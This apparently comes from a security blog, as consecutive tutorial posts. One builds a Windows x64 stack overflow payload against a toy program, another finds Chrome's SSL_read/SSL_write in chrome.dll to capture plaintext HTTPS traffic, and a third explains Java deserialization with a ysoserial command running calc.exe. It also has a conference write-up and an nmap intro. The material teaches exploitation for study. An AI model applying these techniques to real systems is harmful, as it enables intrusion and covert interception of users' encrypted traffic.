And this will be the assembly code for the Copy function:

mov qword ptr ss:[rsp+8],rcx  ; Save the RCX on the stack
sub rsp,58                    ; Allocate space on the stack
mov rdx,qword ptr ss:[rsp+60] ; Put in RDX the "Test" string (second parameter to strcpy)
lea rcx,qword ptr ss:[rsp+20] ; Put in RCX the buffer (first parameter to strcpy)
call <consolex64.strcpy>      ; Call strcpy function
add rsp,58                    ; Cleanup the stack
ret                           ; Return from function

Let’s modify the Copy function call to the following:

Copy("1111111122222222333333334444444455555555");

The string has 40 bytes, and it will fit in our buffer (however, please not that strcpy will also place a NULL byte after our string, but this way it is easier to see the buffer on the stack).

This is how the stack will look like after the strcpy function call:

000000000012FE90 000007FEEE7E5D98 ; Unused stack space
000000000012FE98 00000001400021C8 ; Unused stack space
000000000012FEA0 0000000000000000 ; Unused stack space
000000000012FEA8 00000001400021C8 ; Unused stack space
000000000012FEB0 3131313131313131 ; "11111111"
000000000012FEB8 3232323232323232 ; "22222222"
000000000012FEC0 3333333333333333 ; "33333333"
000000000012FEC8 3434343434343434 ; "44444444"
000000000012FED0 3535353535353535 ; "55555555"
000000000012FED8 0000000000000000 ; Unused stack space
000000000012FEE0 00000001400021A0 ; Unused stack space
000000000012FEE8 0000000140001030 ; Return address

As you can probably see, we need to add extra 24 bytes to overwrite the return address: 16 bytes the unused stack space and 8 bytes for the return address. Let’s modify the Copy function call to the following:

Copy("11111111222222223333333344444444555555556666666677777777AAAAAAAA");

This will overwrite the return address with “AAAAAAAA”.

NULL byte problem

In our case, a call to “strcpy” function will generate the vulnerability. What is important to understand, is that “strcpy” function will stop copying data when it will encounter first NULL byte. For us, this means that we cannot have NULL bytes in our payload.

This is a problem for a simple reason: the addresses that we might use contain NULL bytes. For example, these are the addresses in my case:

0000000140001000 | 48 89 4C 24 08 | mov qword ptr ss:[rsp+8],rcx 
0000000140001005 | 48 83 EC 58    | sub rsp,58 
0000000140001009 | 48 8B 54 24 60 | mov rdx,qword ptr ss:[rsp+60] 
000000014000100E | 48 8D 4C 24 20 | lea rcx,qword ptr ss:[rsp+20] 
0000000140001013 | E8 04 0B 00 00 | call <consolex64.strcpy>
0000000140001018 | 48 83 C4 58    | add rsp,58 
000000014000101C | C3             | ret

If we would like to proceed like in the 32 bits example, we would have to overwrite the return address to an address such as 000000014000101C where there would be a “JMP RSP” instruction, and continue with our shellcode after this address. As you can see, this is not possible, because the address contains NULL bytes.

So, what can we do? We should find a workaround. A simple and useful trick that we can do is the following: we can partially overwrite the return address. So, instead of overwriting the whole 8 bytes of the address, we can overwrite only the last 4, 5 or 6 bytes. Let’s modify the function call to overwrite only the last 5 bytes, so we will just remove 3 “A”s from our payload. The function call will be the following:

Copy("11111111222222223333333344444444555555556666666677777777AAAAA");

Before the “RET” instruction, the stack will look like this:

000000000012FED8 3636363636363636 ; Part of our payload
000000000012FEE0 3737373737373737 ; Part of our payload
000000000012FEE8 0000004141414141 ; Return address

As you can see, we are able to specify a valid address, so we solved our first issue. However, since we cannot add anything else after this, as we need NULL bytes to have a valid address, how can we exploit this vulnerability?

Let’s take a look at the registers, maybe we can find an easy win. Here are the registers before the RET instruction:

Win64 registers

We can see that in the RAX register we can find the address where our payload is stored. This happens for a simple reason: strcpy function will copy the string to the buffer and it will return the address of the buffer. As we already know, the returned data from a function call will be saved in RAX register, so we will have access to our payload using RAX register.

Now, our exploitation is simple:

  1. We have our payload address in RAX register
  2. We find a “JMP RAX” instruction
  3. We specify the address of that instruction as return address

We can easily find some “JMP RAX” instructions:

JMP RAX

We will take one of them, one that does not contain NULL bytes in the middle, and we can create the payload:

  1. 56 bytes of shellcode (required to reach the return address). We will use 0xCC (the INT 3 instruction, which is used to pause the execution of the program in the debugger)
  2. 4 bytes of return address, the “JMP RAX” instruction that we previously found

This is how the function call will look like:

 Copy("\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC"
      "\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC"
      "\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC"
      "\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC"
      "\xF8\x0E\x7E\x77");

And we have control over the program.

However, please note that we have a small buffer and it might be difficult to find a good shellcode to fit in this space. However, the purpose of the article was to find some way to exploit this vulnerability in a way that can be easily understood.

Conclusion

Maybe this article did not cover a real-life situation, but it should be enough as a starting point in exploiting Stack Based Buffer Overflows on Windows 64 bits.

My recommendation is to compile yourself a program like this one and try to exploit it yourself. You can download my simple Visual Studio 2017 project from here.

If you have any questions, please leave a comment here and use the contact email.

nytrosecurity

💾

Win64 registers

💾

JMP RAX

💾

Hooking Chrome’s SSL functions

25 February 2018 at 23:49

The purpose of NetRipper is to capture functions that encrypt or decrypt data and send them through the network. This can be easily achieved for applications such as Firefox, where it is enough to find two DLL exported functions: PR_Read and PR_Write, but it is way more difficult for Google Chrome, where the SSL_Read and SSL_Write functions are not exported.

The main problem for someone who wants to intercept such calls, is that we cannot easily find the functions inside the huge chrome.dll file. So we have to manually find them in the binary. But how can we do it?

Chrome’s source code

In order to achieve our goal, the best starting point might be Chrome’s source code. We can find it here: https://cs.chromium.org/ . It allows us to easily search and navigate through the source code.

We should probably note from the beginning that Google Chrome uses boringssl, a fork of OpenSSL. This project is available in the Chromium source code here.

Now, we have to find the functions we need: SSL_read and SSL_write, and we can easily find the in the ssl_lib.cc file.

SSL_read:

int SSL_read(SSL *ssl, void *buf, int num) {
 int ret = SSL_peek(ssl, buf, num);
 if (ret <= 0) {
 return ret;
 }
 // TODO(davidben): In DTLS, should the rest of the record be discarded? DTLS
 // is not a stream. See https://crbug.com/boringssl/65.
 ssl->s3->pending_app_data =
 ssl->s3->pending_app_data.subspan(static_cast<size_t>(ret));
 if (ssl->s3->pending_app_data.empty()) {
 ssl->s3->read_buffer.DiscardConsumed();
 }
 return ret;
}

SSL_write:

int SSL_write(SSL *ssl, const void *buf, int num) {
 ssl_reset_error_state(ssl);

if (ssl->do_handshake == NULL) {
 OPENSSL_PUT_ERROR(SSL, SSL_R_UNINITIALIZED);
 return -1;
 }

if (ssl->s3->write_shutdown != ssl_shutdown_none) {
 OPENSSL_PUT_ERROR(SSL, SSL_R_PROTOCOL_IS_SHUTDOWN);
 return -1;
 }

int ret = 0;
 bool needs_handshake = false;
 do {
 // If necessary, complete the handshake implicitly.
 if (!ssl_can_write(ssl)) {
 ret = SSL_do_handshake(ssl);
 if (ret < 0) {
 return ret;
 }
 if (ret == 0) {
 OPENSSL_PUT_ERROR(SSL, SSL_R_SSL_HANDSHAKE_FAILURE);
 return -1;
 }
 }

ret = ssl->method->write_app_data(ssl, &needs_handshake,
 (const uint8_t *)buf, num);
 } while (needs_handshake);
 return ret;
}

Why are we looking at the code? It is simple: in the binary we might find things that we can also find in the source code, such as strings or specific values.

I actually discovered the base idea that I will present here, some time ago, probably here, but I will cover all the aspects in order to make sure anyone will be able to find the functions, not only for Chrome, but also for other tools such as Putty or WinSCP.

SSL_write function

Even if SSL_read function does not provide useful information, we can start with SSL_write and we can see something that looks useful:

OPENSSL_PUT_ERROR(SSL, SSL_R_UNINITIALIZED);

Here is the OPENSSL_PUT_ERROR macro:

// OPENSSL_PUT_ERROR is used by OpenSSL code to add an error to the error
// queue.
#define OPENSSL_PUT_ERROR(library, reason) \
 ERR_put_error(ERR_LIB_##library, 0, reason, __FILE__, __LINE__)

Some things are very useful:

  • ERR_put_error is a function call
  • reason is the second parameter, and in our case SSL_R_UNINITIALIZED has the value 226 (0xE2)
  • __FILE__ is the actual filename, full path of ssl_lib.cc
  • __LINE__ is the current line number in ssl_lib.cc file

All this information can help us to find the SSL_write function. Why?

  • We know it is a function call, so the parameters (such as reason, __FILE__ and __LINE__) will be placed on the stack (x86)
  • We know the reason (0xE2)
  • We know the __FILE__ (ssl_lib.cc)
  • We know the __LINE__ (1060 or 0x424 in this version)

But what if there are different versions used? The line numbers can be totally different. Well, in this case, we have to take a look at how Google Chrome uses BoringSSL.

We can find the specific version of Chrome here. For example, right now on x86 I have this version: Version 65.0.3325.181 (Official Build) (32-bit). We can find its source code here. Now, we have to find the BoringSSL code, but it looks like it is not there. However, we can find the DEPS file very useful, and extract some information:

vars = {
...
 'boringssl_git':
 'https://boringssl.googlesource.com',
 'boringssl_revision':
 '94cd196a80252c98e329e979870f2a462cc4f402',

We can see that our Chrome version uses https://boringssl.googlesource.com to get BoringSSL and it uses this revision: 94cd196a80252c98e329e979870f2a462cc4f402. Based on this, we can get the exact code for BoringSSL right here. And this is the ssl_lib.cc file.

Now, let’s see which steps we have to take to get the SSL_write function address:

  1. Search for “ssl_lib.cc” filename in the read-only section of chrome.dll (.rdata)
  2. Get the full path and search for references
  3. Check all references to the string and find the right one based on “reason” and line number parameters

SSL_read function

It was not difficult to find the SSL_write function because there is a OPENSSL_PUT_ERROR, but we do not have it on SSL_read. Let’s see how SSL_read works and follow it.

We can easily see that it calls SSL_peek:

int ret = SSL_peek(ssl, buf, num);

We can see that SSL_peek will call ssl_read_impl function:

int SSL_peek(SSL *ssl, void *buf, int num) {
 int ret = ssl_read_impl(ssl);
 if (ret <= 0) {
 return ret;
 }
...
}

And ssl_read_impl function is trying to help us:

static int ssl_read_impl(SSL *ssl) {
 ssl_reset_error_state(ssl);

if (ssl->do_handshake == NULL) {
 OPENSSL_PUT_ERROR(SSL, SSL_R_UNINITIALIZED);
 return -1;
 }
...
}

We can search in the code and find out that ssl_read_impl function is called just two times, by SSL_peek and SSL_shutdown functions, so it should be pretty easy to find SSL_peek. After we find SSL_peek, SSL_read is straight forward to find.

Chrome on 32 bits

Since we have the general idea about how we can find the functions, let’s find them.

I will use x64dbg but you can probably use any other debugger. We have to go to the “Memory” tab and find chrome.dll. We will need to do two things first:

  • Open the code section in the disassembler, so right click on “.text” and choose “Follow in Disassembler”
  • Open the read-only data section in the dump window, so right click on “.rdata” and choose “Follow in Dump”

We have to find now the “ssl_lib.cc” string in the dump window, so right click inside the window, choose “Find Pattern” and search for our ASCII string. You should have a single result, double click it and go back until you find the full path of the ssl_lib.cc file. Right click the first byte of the full path, as shown in the screenshot below and choose “Find References” to see where we can find it used (OPENSSL_PUT_ERROR function calls).

Found full path 32

It looks like we have multiple references, but we can take them one by one and find the right one. Here is the result.

Found multiple 32

Let’s go to the last one for example, to see how it looks like.

6D44325C | 68 AD 03 00 00 | push 3AD |
6D443261 | 68 24 24 E9 6D | push chrome.6DE92424 | 6DE92424:"../../third_party/boringssl/src/ssl/ssl_lib.cc"
6D443266 | 6A 44          | push 44 |
6D443268 | 6A 00          | push 0 |
6D44326A | 6A 10          | push 10 |
6D44326C | E8 27 A7 00 FF | call chrome.6C44D998 |
6D443271 | 83 C4 14       | add esp,14 |

It looks exactly as we expected, a function call with five parameters. As you probably know, the parameters are pushed on the stack from right to left an we have the following:

  1. push 3AD – The line number
  2. push chrome.6DE92424 – Our string, the file path
  3. push 44 – The reason
  4. push 0 – The parameter which is always 0
  5. push 10 – First parameter
  6. call chrome.6C44D998 – Call the ERR_put_error function
  7. add esp,14 – Clean the stack

However, 0x3AD represents line number 941, which is inside “ssl_do_post_handshake” so it is not what we need.

SSL_write

SSL_write has calls to this function on line numbers 1056 (0x420) and 1061 (x0425) so we will need to find the call to the function with a push 420 or push 425 at the beginning. Going through the results will take just a few seconds until we find it:

6BBA52D0 | 68 25 04 00 00 | push 425 |
6BBA52D5 | 68 24 24 E9 6D | push chrome.6DE92424 | 6DE92424:"../../third_party/boringssl/src/ssl/ssl_lib.cc"
6BBA52DA | 68 C2 00 00 00 | push C2 |
6BBA52DF | EB 0F          | jmp chrome.6BBA52F0 |
6BBA52E1 | 68 20 04 00 00 | push 420 |
6BBA52E6 | 68 24 24 E9 6D | push chrome.6DE92424 | 6DE92424:"../../third_party/boringssl/src/ssl/ssl_lib.cc"
6BBA52EB | 68 E2 00 00 00 | push E2 |
6BBA52F0 | 6A 00          | push 0 |
6BBA52F2 | 6A 10          | push 10 |
6BBA52F4 | E8 9F 86 8A 00 | call chrome.6C44D998 |

We can see here both function calls, but with just a small mention that the first one is optimised. Now, we have just to go back until we find something that looks like the start of a function. While this might not be always the case for other functions, it should work in our case and we can easily find it by classic function prologue:

6BBA5291 | 55    | push ebp |
6BBA5292 | 89 E5 | mov ebp,esp |
6BBA5294 | 53    | push ebx |
6BBA5295 | 57    | push edi |
6BBA5296 | 56    | push esi |

Let’s place a breakpoint at 6BBA5291 and see what happens when we use Chrome to browse some HTTPS website (to avoid issues, browse a website without SPDY or HTTP/2.0).

Here is an example of what we can get on the top of the stack when the breakpoint is triggered:

06DEF274 6A0651E8 return to chrome.6A0651E8 from chrome.6A065291
06DEF278 0D48C9C0 ; First parameter of SSL_write (pointer to SSL)
06DEF27C 0B3C61F8 ; Second parameter, the payload
06DEF280 0000051C ; Third parameter, payload size

If you will right click the second parameter and select “Follow DWORD in Dump”, you should see the plain-text data, such as:

0B3C61F8 50 4F 53 54 20 2F 61 68 2F 61 6A 61 78 2F 72 65 POST /ah/ajax/re 
0B3C6208 63 6F 72 64 2D 69 6D 70 72 65 73 73 69 6F 6E 73 cord-impressions 
0B3C6218 3F 63 34 69 3D 65 50 6D 5F 66 48 70 72 78 64 48 ?c4i=ePm_fHprxdH

SSL_read

Let’s find now the SSL_read function. We should find the call to “OPENSSL_PUT_ERROR” from the ssl_read_impl function. This call is available in line 962 (0x3C2). Let’s go again through the results and find it. Here it is:

6B902FAC | 68 C2 03 00 00 | push 3C2 |
6B902FB1 | 68 24 24 35 6C | push chrome.6C352424 | 6C352424:"../../third_party/boringssl/src/ssl/ssl_lib.cc"
6B902FB6 | 68 E2 00 00 00 | push E2 |
6B902FBB | 6A 00          | push 0 |
6B902FBD | 6A 10          | push 10 |
6B902FBF | E8 D4 A9 00 FF | call chrome.6A90D998 |

Now, we should find the beginning of the function, which should be easy. Right click the first instruction (push EBP), go to “Find references to” and “Selected Address(es)”.

Find ref to ssl_read_impl 32

We should find only one call to the function, which should be SSL_peek. Find the first instruction of SSL_peek and repeat the same step. We should have only one result, which is the call to SSL_peek from SSL_read. So we got it.

6A065F52 | 55             | push ebp | ; SSL_read function
6A065F53 | 89 E5          | mov ebp,esp |
...
6A065F60 | 57             | push edi |
6A065F61 | E8 35 00 00 00 | call chrome.6A065F9B | ; Call SSL_peek

Let’s place a breakpoint, we can see the following on a normal call:

06DEF338 6A065D8F return to chrome.6A065D8F from chrome.6A065F52
06DEF33C 0AF39EA0 ; First parameter of SSL_read, pointer to SSL
06DEF340 0D4D5880 ; Second parameter, the payload
06DEF344 00001000 ; Third parameter, payload length

Now, we should right click the second parameter and choose “Follow DWORD in Dump” before pressing the “Execute til return” button, in order to stop in the debugger at the end of the function, so after the data was read in the buffer. We should be able to see the plain-text data in the Dump window, where we selected the payload.

0D4D5880 48 54 54 50 2F 31 2E 31 20 32 30 30 20 4F 4B 0D HTTP/1.1 200 OK. 
0D4D5890 0A 43 6F 6E 74 65 6E 74 2D 54 79 70 65 3A 20 69 .Content-Type: i 
0D4D58A0 6D 61 67 65 2F 67 69 66 0D 0A 54 72 61 6E 73 66 mage/gif..Transf

We managed to find it as well.

Conclusion

It might look difficult at the beginning, but as you can see, it is pretty easy if we follow the source code in the binary. This approach should work for most of the open-source applications.

As the x64 version would be very similar and the only difference would be the assembly code, it will not be detailed here.

However, please note that hooking those functions this might result in unstable behaviour and possible crashes.

nytrosecurity

💾

Found full path 32

💾

Found multiple 32

💾

Find ref to ssl_read_impl 32

💾

NetRipper at BlackHat Asia Arsenal 2018

31 March 2018 at 20:52

I had the opportunity to present NetRipper at BlackHat Asia Arsenal 2018 and it was amazing. As you probably know, BlackHat conferences have trainings, briefings (presentations), vendor’s area and Arsenal. Arsenal is the perfect place for anyone who wants to present its open-source tool. It is organised by ToolsWatch and I totally recommend you to check it out if you participate to any BlackHat conference.

Arsenal

Since it was my first BlackHat conference, I did not know what to expect and how things will go. I knew that Arsenal presentations take place in booths (stations) in the vendor’s area and this might look strange at the beginning, but as soon as I saw it, I realised that this is perfect.

At BlackHat Asia, there are 6 Arsenal stations where 6 open-source tools are presented at the same time, each tool being presented for about two hours. This is followed by another round of 6 tools, for another 2 hours, and so on, to the end of the day. This is how a station looks like:

DY3nx3vVQAAmx-v

You can find the list of tools here: https://www.blackhat.com/asia-18/arsenal.html

It is important to note that you will not see slides at Arsenal (or just a few). Arsenal is focused on interaction between the speaker and the participants and you will see a lot of demos.  You go there to talk to people about their tools, ask them questions and see them in action. There is no time for slides (I used only one, with contact information and GitHub page) and you can learn anything you want from each tool and even recommend new features and improvements.

DY82rOUVwAALJ1P

It will take you just a few minutes to see each tool in action, so you will have enough time to see all of them. You should take your time, as you might realise that those tools might really help you on your engagements.

Speakers

If you develop your own open-source tool, I suggest you to apply to Arsenal call for papers. The only issue is that you (or your company) have to cover the travel and hotel expenses, but it will worth it.

Arsenal is one of the best places to show your project, to get real-time feedback and to find bugs during your demos (it happens, a lot).

You will have the opportunity to interact to a lot of people with different views: some of them might be very technical, some of them might not, but for sure, all of them will help you to build a better tool.

You will also have the opportunity to interact with other Arsenal speakers and you might find that your tools can do a good job together. Here is a a photo with all (or most) of us:

IMG_8937

Also, as anyone working on his free time on a project, Arsenal might be a very good motivation to build a powerful and stable tool. You will not want to go there with an unstable tool, of course.

Oh, if this is not enough, you should also know that you will receive a Briefings pass as well, so you will also have the possibility to see the presentations. And since a Briefings pass is not very cheap, this should encourage you to present.

Conclusion

BlackHat Arsenal is an amazing place, both for visitors and speakers. Also, even if the trip might cost some money (however, my company paid for my trip), it will totally worth it. Oh, I almost forgot… Singapore is a really nice city to visit. 🙂

nytrosecurity

💾

DY3nx3vVQAAmx-v

💾

DY82rOUVwAALJ1P

💾

IMG_8937

💾

Understanding Java deserialization

30 May 2018 at 08:53

Some time ago I detailed PHP Object Injection vulnerabilities and this post will get into details of Java deserialization vulnerabilities. The concept is simple: developers use a feature of the programming language, serialization, to simplify their job, but they are not aware about the risks.

Java deserialization is a vulnerability similar to deserialization vulnerabilities in other programming languages. This class of vulnerabilities came to life in 2006, it become more common and more exploited and it is now part of the OWASP Top 10 2017.

What is deserialization?

In order to understand deserialization (or unserialization), we need to understand first serialization.

Each application deals with data, such as user information (e.g. username, age) and uses it to do different actions: run SQL queries, log them into files (be careful with GDPR) or just display them. Many programming languages offers the possibility to work with objects so developers can group data and methods together in classes.

Serialization is the process of translating the application data (such as objects) into a binary format that can be stored or sent over the network, in order to be reused by the same or by other application, which will deserialize it as a reverse process.

The basic idea is that it is easy to create and reuse objects.

Serialization example

Let’s take a simple example of code to see how serialization works. We will serialize a simple String object.

import java.io.*;

public class Serial
{
    public static void main(String[] args)
    {
        String name = "Nytro";
        String filename = "file.bin";

        try
        {
            FileOutputStream file  = new FileOutputStream(filename);
            ObjectOutputStream out = new ObjectOutputStream(file);

            // Serialization of the "name" (String) object
            // Will be written to "file.bin"

            out.writeObject(name);

            out.close();
            file.close();
        }
        catch(Exception e)
        {
            System.out.println("Exception: " + e.toString());
        }
    }
}

We have the following:

  • A String (object) “name”, which we will serialize
  • A file name where we will write the serialized data (we will use FileOutputStream)
  • We call “writeObject” method to serialize the object (using ObjectOutputStream)
  • We cleanup

As you can see, serialization is simple. Below is the content of the serialized data, the content of “file.bin” in hexadecimal format:

AC ED 00 05 74 00 05 4e 79 74 72 6f            ....t..Nytro

We can see the following:

  • Data starts with the binary “AC ED” – this is the “magic number” that identifies serialized data, so all serialized data will start with this value
  • Serialization protocol version “00 05”
  • We only have a String identified by “74”
  • Followed by the length of the string “00 05”
  • And, finally, our string

We can save this object on the file system, we can store it in a database, or we can even send it to another system over the network. To reuse it, we just need to deserialize it later, on the same system or on a different system and we should be able to fully reconstruct it. Of course, being a simple String, it’s not a big deal, but it can be any object.

Let’s see now how easy it is to deserialize it:

String name;
String filename = "file.bin";

try
{
    FileInputStream file  = new FileInputStream(filename);
    ObjectInputStream out = new ObjectInputStream(file);

    // Serialization of the "name" (String) object
    // Will be written to "file.bin"

    name = (String)out.readObject();
    System.out.println(name);

    out.close();
    file.close();
}
catch(Exception e)
{
    System.out.println("Exception: " + e.toString());
}

We need the following:

  • An empty string to store the reconstructed – deserialized object (name)
  • The file name where we can find the serialized data (using FileInputStream)
  • We call “readObject” to deserialize the object (using ObjectInputStream) – and convert the Object returned to String
  • We cleanup

By running this, we should be able to reconstruct the serialized object.

What can go wrong?

Let’s see what can happen if we want to do something useful with the serialization.

We can execute different actions as soon as the data is read from the serialized object. Let’s see a few theoretical examples of what developers might do during deserialization:

  • if we deserialize an “SQLConnection” object (e.g. with a ConnectionString), we can connect to the database
  • if we deserialize an “User” object (e.g. with a Username), we can retrieve user information form the database (by running some SQL queries)
  • if we deserialize a “LogFile” object (e.g. with Filename and Filecontent) we can restore the previously saved log data

In order to do something useful after deserialization, we need to implement a “readObject” method in the class we deserialize. Let’s take the “LogFile” example.

// Vulnerable class

class LogFile implements Serializable
{
   public String filename;
   public String filecontent;

  // Function called during deserialization

  private void readObject(ObjectInputStream in)
  {
     System.out.println("readObject from LogFile");

     try
     {
        // Unserialize data

        in.defaultReadObject();
        System.out.println("File name: " + filename + ", file content: \n" + filecontent);

        // Do something useful with the data
        // Restore LogFile, write file content to file name

        FileWriter file = new FileWriter(filename);
        BufferedWriter out = new BufferedWriter(file);

        System.out.println("Restoring log data to file...");
        out.write(filecontent);

        out.close();
        file.close();
     }
     catch (Exception e)
     {
         System.out.println("Exception: " + e.toString());
     }
   }
}

We can see the following:

  • implements Serializable – The class has to implement this interface to be serializable
  • filename and filecontent – Class variables, which should contain the “LogFile” data
  • readObject – The function that will be called during deserialization
  • in.defaultReadObject() – Function that performs the default deserialization -> will read the data from the file and set the values to our filename and filecontent variables
  • out.write(filecontent) – Our vulnerable class wants to do something useful, and it will restore the log file data (from filecontent) to a file on the disk (from filename)

So, what’s wrong here? A possible use case for this class is the following:

  1. A user logs in and execute some actions in the application
  2. The actions will generate a user-specific log file, using this class
  3. The user has the possibility to download (serialize LogFile) it’s logged data
  4. The user has the possibility to upload (deserialize LogFile) it’s previously saved data

In order to work easier with serialization, we can use the following class to serialize and deserialize data from files:

class Utils
{
    // Function to serialize an object and write it to a file

    public static void SerializeToFile(Object obj, String filename)
    {
        try
        {
            FileOutputStream file = new FileOutputStream(filename);
            ObjectOutputStream out = new ObjectOutputStream(file);

            // Serialization of the object to file

            System.out.println("Serializing " + obj.toString() + " to " + filename);
            out.writeObject(obj);

            out.close();
            file.close();
        }
        catch(Exception e)
        {
            System.out.println("Exception: " + e.toString());
        }
    }

    // Function to deserialize an object from a file

    public static Object DeserializeFromFile(String filename)
    {
        Object obj = new Object();

        try
        {
            FileInputStream file = new FileInputStream(filename);
            ObjectInputStream in = new ObjectInputStream(file);

            // Deserialization of the object to file

            System.out.println("Deserializing from " + filename);
            obj = in.readObject();

            in.close();
            file.close();
        }
        catch(Exception e)
        {
            System.out.println("Exception: " + e.toString());
        }

        return obj;
    }
}

Let’s see how a serialized object will look like. Below is the serialization of the object:

LogFile ob = new LogFile();
ob.filename = "User_Nytro.log";
ob.filecontent = "No actions logged";

String file = "Log.ser";

Utils.SerializeToFile(ob, file);

Here is the content (hex) of the Log.ser file:

AC ED 00 05 73 72 00 07 4C 6F 67 46 69 6C 65 D7 ¬í..sr..LogFile×
60 3D D7 33 3E BC D1 02 00 02 4C 00 0B 66 69 6C `=×3>¼Ñ...L..fil
65 63 6F 6E 74 65 6E 74 74 00 12 4C 6A 61 76 61 econtentt..Ljava
2F 6C 61 6E 67 2F 53 74 72 69 6E 67 3B 4C 00 08 /lang/String;L..
66 69 6C 65 6E 61 6D 65 71 00 7E 00 01 78 70 74 filenameq.~..xpt
00 11 4E 6F 20 61 63 74 69 6F 6E 73 20 6C 6F 67 ..No actions log
67 65 64 74 00 0E 55 73 65 72 5F 4E 79 74 72 6F gedt..User_Nytro
2E 6C 6F 67                                     .log

As you can see, it looks simple. We can see the class name, “LogFile”, “filename” and “filecontent” variable names and we can also see their values. However, it is important to note that there is no code, it is only the data.

Let’s dig into it to see what it contains:

  • AC ED -> We already discussed about the magic number
  • 00 05 -> And protocol version
  • 73 -> We have a new object (TC_OBJECT)
  • 72 -> Refers to a class description (TC_CLASSDESC)
  • 00 07 -> The length of the class name – 7 characters
  • 4C 6F 67 46 69 6C 65 -> Class name – LogFile
  • D7 60 3D D7 33 3E BC D1 -> Serial version UID – An identifier of the class. This value can be specified in the class, if not, it is generated automatically
  • 02 -> Flag mentioning that the class is serializable (SC_SERIALIZABLE) – a class can also be externalizable
  • 00 02 -> Number of variables in the class
  • 4C -> Type code/signature – class
  • 00 0B -> Length of the class variable – 11
  • 66 69 6C 65 63 6F 6E 74 65 6E 74 -> Variable name – filecontent
  • 74 -> A string (TC_STRING)
  • 00 12 -> Length of the class name
  • 4C 6A 61 76 61 2F 6C 61 6E 67 2F 53 74 72 69 6E 67 3B -> Class name – Ljava/lang/String;
  • 4C -> Type code/signature – class
  • 00 08 -> Length of the class variable – 8
  • 66 69 6C 65 6E 61 6D 65 -> Variable name – filename
  • 71 -> It is a reference to a previous object (TC_REFERENCE)
  • 00 7E 00 01 -> Object reference ID. Referenced objects start from 0x7E0000
  • 78 -> End of block data for this object (TC_ENDBLOCKDATA)
  • 70 -> NULL reference, we finished the “class description”, the data will follow
  • 74 -> A string (TC_STRING)
  • 00 11 -> Length of the string – 17 characters
  • 4E 6F 20 61 63 74 69 6F 6E 73 20 6C 6F 67 67 65 64 -> The string – No actions logged
  • 74 -> A string (TC_STRING)
  • 00 0E -> Length of the string – 14 characters
  • 55 73 65 72 5F 4E 79 74 72 6F 2E 6C 6F 67 -> The string – User_Nytro.log

The protocol details are not important, but they might help if manually updating a serialized object is required.

Attack example

As you might expect, the issue happens during the deserialization process. Below is a simple example of deserialization.

LogFile ob = new LogFile();
 String file = "Log.ser";

// Deserialization of the object 
 
 ob = (LogFile)Utils.DeserializeFromFile(file);

And here is the output:

Deserializing from Log.ser
readObject from LogFile
File name: User_Nytro.log, file content: No actions logged
Restoring log data to file...

What happens is pretty straightforward:

  1. We deserialize the “Log.ser” file (containing a serialized LogFile object)
  2. This will automatically call “readObject” method of “LogFile” class
  3. It will print the file name and the file content
  4. And it will create a file called “User_Nytro.log” containing “No actions logged” text

As you can see, an attacker will be able to write any file (depending on permissions) with any content on the system running the vulnerable application. It is not a directly exploitable Remote Command Execution, but it might be turned into one.

We need to understand a few important things:

  • Serialized objects do not contain code, they contain only data
  • The serialized object contains the class name of the serialized object
  • Attackers control the data, but they do not contain the code, meaning that the attack depends on what the code does with the data

Is is important to note that readObject is not the only affected method. The readResolvereadExternal and readUnshared methods have to be checked as well. Oh, we should not forget XStream. And this is not the full list…

For black-box testing, it might be easy to find serialized objects by looking into the network traffic and trying to find 0xAC 0xED bytes or “ro0” base64 encoded bytes. If we do not have any information about the libraries on the remote system, we can just iterate through all ysoserial payloads and throw them at the application.

But my readObject is safe

This might be the most common problem regarding deserialization vulnerabilities. Any application doing deserialization is vulnerable as long as in the class-path are other vulnerable classes. This happens because, as we already discussed earlier, the serialized object contains a class name. Java will try to find the class specified in the serialized object in the class path and load it.

One of the most important vulnerabilities was discovered in the well-known Apache Commons Collections library. If on the system running the deserialization application a vulnerable version of this library or multiple other vulnerable libraries is present, the deserialization vulnerability can result in remote command execution.

Let’s do an example and completely remove the “readObject” method from our LogFile class. Since it will not do anything, we should be safe, right? However, we should also download commons-collections-3.2.1.jar library and extract it in the class-path (the org directory).

In order to exploit this vulnerability, we can easily use ysoserial tool. The tool has a collection of exploits and it allows us to generate serialized objects that will execute commands during deserialization. We just need to specify the vulnerable library. Below is an example for Windows:

java -jar ysoserial-master.jar CommonsCollections5 calc.exe > Exp.ser

This will generate a serialized object (Exp.ser file) for Apache Commons Collections vulnerable library and the exploit will execute the “calc.exe” command. What happens if our code will read this file and deserialize the data?

LogFile ob = new LogFile();
 String file = "Exp.ser";

// Deserialization of the object

ob = (LogFile)Utils.DeserializeFromFile(file);

This will be the output:

Deserializing from Exp.ser
Exception in thread "main" java.lang.ClassCastException: java.management/javax.management.BadAttributeValueExpException cannot be cast to LogFile
 at LogFiles.main(LogFiles.java:105)

But this will result as well:

Calculator

We can see that an exception related to casting the deserialized object was thrown, but this happened after the deserialization process took place. So even if the application is safe, if there are vulnerable classes out there, it is game over. Oh, it is also possible to have issues with deserialization directly on JDK, without any 3rd party libraries.

How to prevent it?

The most common suggestion is to use Look Ahead ObjectInputStream. This method allows to prevent deserialization of untrusted classes by implementing a whitelist or a blacklist of classes that can be deserialized.

However, the only secure way to do serialization is to not do it.

Conclusion

Java deserialization vulnerabilities became more common and dangerous. Public exploits are available and is easy for attackers to exploit these vulnerabilities.

It might be useful to document a bit more about this vulnerability. You can find here a lot of useful resources.

We also have to consider that Oracle plans to dump Java serialization.

However, the important thing to remember is that we should just avoid (de)serialization.

nytrosecurity

💾

Calculator

💾

Network scanning with nmap

21 January 2019 at 06:45

Introduction

First step in the process of penetration testing is “Information gathering”, the phase where it is useful to get as much information about the target(s) as possible. While it might be different for the different type of penetration tests, such as web application or mobile application pentest, network scanning is a crucial step in the infrastructure or network pentest.

Let’s take a simple scenario: you are a penetration tester and a company want to test one of its servers. They send you the IP address of the server. How to proceed? Although nmap allows to easily specify multiple IP targets or IP classes, to keep things simple, I will use a single target IP address which I have the permission to scan (my server): 137.74.202.89.

Why?

